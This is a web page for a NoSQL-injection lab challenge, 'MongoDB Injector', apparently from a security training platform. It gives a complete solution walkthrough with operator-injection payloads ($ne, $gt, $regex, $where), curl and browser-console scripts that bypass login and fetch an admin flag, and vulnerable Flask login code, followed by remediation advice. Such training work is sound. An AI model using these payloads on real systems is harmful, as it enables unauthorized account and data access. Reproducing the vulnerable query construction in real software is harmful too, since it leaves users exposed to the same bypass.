Avatar

Labs / MongoDB Injector

  • Daily Challenge
  • Released 05 Sep 2025

🍃 Can you exploit NoSQL queries to bypass their document database security?

A modern user management system relies on MongoDB for secure data storage, implementing document-based authentication and user profiles. But when JSON queries meet insufficient input sanitization, even the most flexible NoSQL databases can become vulnerable to injection attacks. 🎯 Time to test your NoSQL exploitation skills against cutting-edge database technology!

1
Flags
1
Points
Daily Challenge
Pro Exclusive
Start Lab Environment
~1-2 min setup
AWS dedicated
Private instance
Industry standard
Daily Challenge

🍃 MongoDB Injector - Complete NoSQL Injection Solution

Objective: Exploit NoSQL injection vulnerabilities in a MongoDB-based user management API to bypass authentication and gain administrative access to retrieve the flag.
🔍 Step 1: Understanding NoSQL Injection

NoSQL injection occurs when user input is directly incorporated into database queries without proper sanitization. Unlike SQL injection, NoSQL injection exploits the flexible query structure of document databases like MongoDB, often using JSON operators and query manipulation.

Normal MongoDB Query:
db.users.find({"username": "admin", "password": "secret"})

Vulnerable Construction:
db.users.find({"username": user_input, "password": pass_input})

With NoSQL Injection:
db.users.find({"username": {"$ne": null}, "password": {"$ne": null}})
🔍 Step 2: Application Analysis

Navigate to to access the SecureDoc User Management API. The application provides a REST API for user authentication and profile management with the following endpoints:

  • POST /api/login - User authentication (vulnerable to NoSQL injection)
  • GET /api/profile - User profile information
  • GET /api/admin/users - Admin-only user listing
  • GET /api/admin/flag - Admin-only flag endpoint

Test Credentials:

  • Regular User: username: testuser, password: password123
  • Admin credentials are NOT provided - exploitation is required
🔍 Step 3: Identifying the Vulnerability

The application constructs MongoDB queries by directly incorporating user input:

# VULNERABLE: Direct incorporation of user input
query = {
"username": request.json.get('username'),
"password": request.json.get('password')
}
user = db.users.find_one(query)

This construction allows attackers to inject MongoDB operators and manipulate query logic.

🔍 Step 4: NoSQL Injection Techniques
Operator Injection
# Inject $ne (not equal) operator
{
"username": {"$ne": null},
"password": {"$ne": null}
}

# This matches any user with non-null credentials
Regex Injection
# Inject $regex operator
{
"username": {"$regex": ".*"},
"password": {"$regex": ".*"}
}

# This matches any username and password
🔍 Step 5: Authentication Bypass Attack

The most effective NoSQL injection payload uses the $ne (not equal) operator:

Working Payload:
POST /api/login
Content-Type: application/json

{
"username": {"$ne": null},
"password": {"$ne": null}
}

How this works:

  1. The query becomes: db.users.find({"username": {"$ne": null}, "password": {"$ne": null}})
  2. The $ne: null condition matches any document where the field is not null
  3. MongoDB returns the first user that matches (often an admin user)
  4. The application authenticates as that user without knowing the actual credentials
🔍 Step 6: Step-by-Step Exploitation
Using cURL
# Execute NoSQL injection
curl -X POST /api/login \
-H "Content-Type: application/json" \
-d '{"username":{"$ne":null},"password":{"$ne":null}}' \
-c cookies.txt

# Expected response:
# {"message":"Login successful","user":"admin"}
Verify Admin Access
# Check if we gained admin privileges
curl -X GET /api/admin/users \
-b cookies.txt

# Should return user list if admin access gained
🔍 Step 7: Flag Retrieval

With admin privileges gained through NoSQL injection, access the flag:

# Access admin flag endpoint
curl -X GET /api/admin/flag -b cookies.txt

# Expected response:
{
"flag": "[FLAG_UUID_HERE]",
"message": "Congratulations! You have successfully exploited the NoSQL injection vulnerability.",
"admin_user": "admin"
}
🔍 Step 8: Alternative NoSQL Injection Techniques
Greater Than Injection
# Using $gt (greater than)
{
"username": {"$gt": ""},
"password": {"$gt": ""}
}

# Matches users with non-empty strings
Exists Operator
# Using $exists operator
{
"username": {"$exists": true},
"password": {"$exists": true}
}

# Matches users where fields exist
In Operator
# Using $in operator
{
"username": {"$in": ["admin", "root", "user"]},
"password": {"$ne": null}
}

# Targets specific usernames
🔍 Step 9: Browser-Based Exploitation

You can also exploit this using browser developer tools:

  1. Navigate to and open Developer Tools (F12)
  2. Go to the Console tab
  3. Execute the following JavaScript:
// NoSQL injection via browser console
fetch('/api/login', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({
username: {$ne: null},
password: {$ne: null}
})
})
.then(r => r.json())
.then(data => {
console.log('Login result:', data);
// If successful, get the flag
return fetch('/api/admin/flag');
})
.then(r => r.json())
.then(flag => console.log('Flag:', flag));
🔍 Step 10: Understanding MongoDB Query Structure

MongoDB queries use JSON-like syntax with special operators:

OperatorDescriptionExample
$neNot equal{"field": {"$ne": "value"}}
$gtGreater than{"age": {"$gt": 18}}
$ltLess than{"age": {"$lt": 65}}
$inIn array{"role": {"$in": ["admin", "user"]}}
$regexRegular expression{"name": {"$regex": "^A.*"}}
$existsField exists{"email": {"$exists": true}}
$orLogical OR{"$or": [{"a": 1}, {"b": 2}]}
🔍 Step 11: Advanced Exploitation Techniques
Blind NoSQL Injection
# Extract username character by character
{
"username": {"$regex": "^a.*"},
"password": {"$ne": null}
}

# Test if username starts with 'a'
Time-Based Injection
# Using $where for JavaScript execution
{
"$where": "sleep(5000) || true",
"username": "admin"
}

# Causes 5-second delay if vulnerable
🔍 Step 12: Burp Suite Exploitation

Using Burp Suite for systematic testing:

  1. Configure browser to use Burp proxy
  2. Navigate to the application and attempt normal login
  3. Intercept the login request in Burp
  4. Send the request to Repeater
  5. Modify the JSON payload to include NoSQL operators
  6. Test various injection payloads systematically
  7. Analyze responses for successful authentication
🔍 Step 13: Vulnerability Analysis

The vulnerability exists because:

# VULNERABLE Flask code
@app.route('/api/login', methods=['POST'])
def login():
data = request.get_json()
# Direct incorporation of user input - DANGEROUS!
query = {
'username': data.get('username'),
'password': data.get('password')
}
user = db.users.find_one(query)
if user:
session['user'] = user['username']
return jsonify({'message': 'Login successful', 'user': user['username']})
return jsonify({'error': 'Invalid credentials'}), 401

Key vulnerability factors:

  • Direct Input Incorporation: User input directly used in database query
  • No Input Validation: No checks for MongoDB operators in input
  • JSON Parsing: Flask automatically parses JSON, allowing object injection
  • Flexible Query Structure: MongoDB's flexible query syntax enables operator injection
🔍 Step 14: Security Implications

NoSQL injection vulnerabilities can lead to:

  • Authentication Bypass: Gain unauthorized access to user accounts
  • Data Extraction: Extract sensitive information from the database
  • Privilege Escalation: Access administrative functions
  • Data Manipulation: Modify or delete database records
  • Information Disclosure: Reveal database structure and contents
  • Denial of Service: Cause performance issues with complex queries
🔍 Step 15: Remediation Strategies

To prevent NoSQL injection vulnerabilities:

  • Input Validation: Validate and sanitize all user input
  • Type Checking: Ensure input matches expected data types
  • Operator Filtering: Remove or escape MongoDB operators from user input
  • Parameterized Queries: Use proper query builders and ORM libraries
  • Least Privilege: Use database accounts with minimal required permissions
  • Security Testing: Regular penetration testing for injection vulnerabilities
  • Schema Validation: Implement strict schema validation for input data
MongoDB Operators to Filter:
Common injection operators: $ne, $gt, $lt, $gte, $lte, $in, $nin, $regex, $where, $exists, $or, $and, $not
Flag Location: The flag is accessible at /api/admin/flag after successfully exploiting NoSQL injection to bypass authentication and gain admin privileges. The complete attack chain: NoSQL Inject → Bypass Auth → Gain Admin → Retrieve Flag.
Real-World Application: This challenge demonstrates realistic NoSQL injection techniques commonly found in modern web applications using document databases. The operator injection approach is based on actual vulnerabilities found in MongoDB-based applications and is a fundamental technique in NoSQL security testing.